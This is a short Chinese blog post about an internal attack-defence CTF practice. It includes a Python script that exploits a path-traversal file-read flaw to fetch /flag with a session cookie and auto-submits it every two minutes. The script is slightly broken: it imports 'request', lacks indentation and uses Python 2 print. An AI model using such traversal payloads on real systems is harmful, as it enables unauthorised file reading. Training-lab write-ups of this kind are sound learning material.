背景
近期部门内搭建了攻防实验平台供大家练习,周末组织了一波AWD练习,之前都是做渗透测试比较多,加之题目比较简单,找到漏洞getshell拿flag都没问题,只不过如果没找到突破口flag都要手动提交的话,拿分会慢很多。
在过程中发现其实除了getshell后在服务器根目录/下读到flag,其实靶机网站中还存在一个任意文件读取漏洞,那这样写脚本自动flag就简单得多了。
自动提交flag的脚本
#! /usr/bin/env python
# coding: utf-8
import os
import time
import request
url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"
while True:
flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
print flag
url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
submit = request.get(url2).text
print submit
time.sleep(60*2) #flag两分钟更新一次
后记
只是想记录一下,flag不一定需要getshell后才能拿到,所以写自动提交flag的脚本也可以是多样的